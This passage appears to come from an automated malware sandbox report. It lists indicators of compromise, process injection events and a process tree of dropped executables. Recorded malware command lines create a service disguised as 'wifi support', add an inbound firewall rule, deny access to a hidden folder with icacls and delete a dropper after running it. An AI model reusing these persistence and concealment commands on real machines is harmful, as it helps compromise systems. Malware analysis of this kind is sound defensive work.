2140	iuehjsa
3008	jjehjsa
2300	iuehjsa
2180	jjehjsa
2932	iuehjsa
1080	jjehjsa
3048	iuehjsa
1568	jjehjsa

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

FAC9.exe101.exeE812.exetaskkill.exeFABE.exeWerFault.exepowershell.exeD5E5.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1212	FAC9.exe
Token: SeDebugPrivilege	1232	101.exe
Token: SeDebugPrivilege	720	E812.exe
Token: SeDebugPrivilege	988	taskkill.exe
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeDebugPrivilege	1708	FABE.exe
Token: SeDebugPrivilege	324	WerFault.exe
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeDebugPrivilege	1900	D5E5.exe
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeDebugPrivilege	1900	taskkill.exe
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264
Token: SeShutdownPrivilege	1264

Suspicious use of FindShellTrayWindow 22 IoCs

Processes:

pid process

1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
Suspicious use of SendNotifyMessage 15 IoCs

Processes:

pid process

1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264

pid	process
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264

pid	process
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exeCF8F.exeD48F.exeE812.exe

description	pid	process	target process
PID 612 wrote to memory of 1112	612	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
PID 612 wrote to memory of 1112	612	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
PID 612 wrote to memory of 1112	612	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
PID 612 wrote to memory of 1112	612	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
PID 612 wrote to memory of 1112	612	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
PID 612 wrote to memory of 1112	612	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
PID 612 wrote to memory of 1112	612	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
PID 1264 wrote to memory of 812	1264		CF8F.exe
PID 1264 wrote to memory of 812	1264		CF8F.exe
PID 1264 wrote to memory of 812	1264		CF8F.exe
PID 1264 wrote to memory of 812	1264		CF8F.exe
PID 1264 wrote to memory of 1164	1264		D48F.exe
PID 1264 wrote to memory of 1164	1264		D48F.exe
PID 1264 wrote to memory of 1164	1264		D48F.exe
PID 1264 wrote to memory of 1164	1264		D48F.exe
PID 812 wrote to memory of 1056	812	CF8F.exe	CF8F.exe
PID 812 wrote to memory of 1056	812	CF8F.exe	CF8F.exe
PID 812 wrote to memory of 1056	812	CF8F.exe	CF8F.exe
PID 812 wrote to memory of 1056	812	CF8F.exe	CF8F.exe
PID 812 wrote to memory of 1056	812	CF8F.exe	CF8F.exe
PID 812 wrote to memory of 1056	812	CF8F.exe	CF8F.exe
PID 812 wrote to memory of 1056	812	CF8F.exe	CF8F.exe
PID 1264 wrote to memory of 1344	1264		DE12.exe
PID 1264 wrote to memory of 1344	1264		DE12.exe
PID 1264 wrote to memory of 1344	1264		DE12.exe
PID 1264 wrote to memory of 1344	1264		DE12.exe
PID 1164 wrote to memory of 824	1164	D48F.exe	cmd.exe
PID 1164 wrote to memory of 824	1164	D48F.exe	cmd.exe
PID 1164 wrote to memory of 824	1164	D48F.exe	cmd.exe
PID 1164 wrote to memory of 824	1164	D48F.exe	cmd.exe
PID 1264 wrote to memory of 1628	1264		E18C.exe
PID 1264 wrote to memory of 1628	1264		E18C.exe
PID 1264 wrote to memory of 1628	1264		E18C.exe
PID 1264 wrote to memory of 1628	1264		E18C.exe
PID 1164 wrote to memory of 1824	1164	D48F.exe	cmd.exe
PID 1164 wrote to memory of 1824	1164	D48F.exe	cmd.exe
PID 1164 wrote to memory of 1824	1164	D48F.exe	cmd.exe
PID 1164 wrote to memory of 1824	1164	D48F.exe	cmd.exe
PID 1164 wrote to memory of 1744	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 1744	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 1744	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 1744	1164	D48F.exe	sc.exe
PID 1264 wrote to memory of 1968	1264		E812.exe
PID 1264 wrote to memory of 1968	1264		E812.exe
PID 1264 wrote to memory of 1968	1264		E812.exe
PID 1264 wrote to memory of 1968	1264		E812.exe
PID 1164 wrote to memory of 1208	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 1208	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 1208	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 1208	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 1536	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 1536	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 1536	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 1536	1164	D48F.exe	sc.exe
PID 1164 wrote to memory of 2036	1164	D48F.exe	netsh.exe
PID 1164 wrote to memory of 2036	1164	D48F.exe	netsh.exe
PID 1164 wrote to memory of 2036	1164	D48F.exe	netsh.exe
PID 1164 wrote to memory of 2036	1164	D48F.exe	netsh.exe
PID 1968 wrote to memory of 720	1968	E812.exe	E812.exe
PID 1968 wrote to memory of 720	1968	E812.exe	E812.exe
PID 1968 wrote to memory of 720	1968	E812.exe	E812.exe
PID 1968 wrote to memory of 720	1968	E812.exe	E812.exe
PID 1968 wrote to memory of 720	1968	E812.exe	E812.exe
PID 1968 wrote to memory of 720	1968	E812.exe	E812.exe

C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
"C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:612

C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
"C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1112

C:\Users\Admin\AppData\Local\Temp\CF8F.exe
C:\Users\Admin\AppData\Local\Temp\CF8F.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:812

C:\Users\Admin\AppData\Local\Temp\CF8F.exe
C:\Users\Admin\AppData\Local\Temp\CF8F.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1056

C:\Users\Admin\AppData\Local\Temp\D48F.exe
C:\Users\Admin\AppData\Local\Temp\D48F.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gipbfwre\
2⤵
PID:824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zfadmvvq.exe" C:\Windows\SysWOW64\gipbfwre\
2⤵
PID:1824

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create gipbfwre binPath= "C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe /d\"C:\Users\Admin\AppData\Local\Temp\D48F.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:1744

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description gipbfwre "wifi internet conection"
2⤵
PID:1208

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start gipbfwre
2⤵
PID:1536

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:2036

C:\Users\Admin\AppData\Local\Temp\DE12.exe
C:\Users\Admin\AppData\Local\Temp\DE12.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1344

C:\Users\Admin\AppData\Local\Temp\E18C.exe
C:\Users\Admin\AppData\Local\Temp\E18C.exe
1⤵
- Executes dropped EXE
PID:1628

C:\Users\Admin\AppData\Local\Temp\E812.exe
C:\Users\Admin\AppData\Local\Temp\E812.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1968

C:\Users\Admin\AppData\Local\Temp\E812.exe
C:\Users\Admin\AppData\Local\Temp\E812.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:720

C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe
C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe /d"C:\Users\Admin\AppData\Local\Temp\D48F.exe"
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jfefuofz\
2⤵
PID:528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Windows\TEMP\gyqxwnyf.exe" C:\Windows\SysWOW64\jfefuofz\
2⤵
PID:1428

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create jfefuofz binPath= "C:\Windows\SysWOW64\jfefuofz\gyqxwnyf.exe /d\"C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:1276

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description jfefuofz "wifi internet conection"
2⤵
PID:484

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start jfefuofz
2⤵
PID:368

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
- Modifies data under HKEY_USERS
PID:1952

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F877.dll
1⤵
- Loads dropped DLL
PID:1684

C:\Users\Admin\AppData\Local\Temp\FAC9.exe
C:\Users\Admin\AppData\Local\Temp\FAC9.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1212

C:\Users\Admin\AppData\Local\Temp\101.exe
C:\Users\Admin\AppData\Local\Temp\101.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1232

C:\Users\Admin\AppData\Local\Temp\630.exe
C:\Users\Admin\AppData\Local\Temp\630.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1180

C:\ProgramData\cupd.exe
"C:\ProgramData\cupd.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
3⤵
PID:932

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:1468

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:1740

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
4⤵
- Modifies file permissions
PID:1640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\630.exe" & exit
2⤵
PID:364

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
3⤵
- Delays execution with timeout.exe
PID:856

C:\Windows\system32\taskeng.exe
taskeng.exe {647FF540-8865-4C26-A0E7-9036F3F3C0BF} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:1820

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1256

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:952

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
PID:1192

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:988

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1472

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1708

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1556

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1560

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1608

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:856

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:1944

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:1936

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1588

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1732

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1740

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1696

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1992

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1148

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1292

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1444

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1792

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:788

C:\Users\Admin\AppData\Roaming\jjehjsa
C:\Users\Admin\AppData\Roaming\jjehjsa
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:1216

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1200

C:\Users\Admin\AppData\Roaming\iuehjsa
C:\Users\Admin\AppData\Roaming\iuehjsa
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:572

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1548

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1992

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1480

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:364

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:964

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:560

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2016

C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
C:\Users\Admin\AppData\Roaming\x86_microsoft-windows-ie-controls.resources_31bf3856ad364e35_8.0.7600.16385_ru-ru_119accf4e13dbd41\sisbkup.exe
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
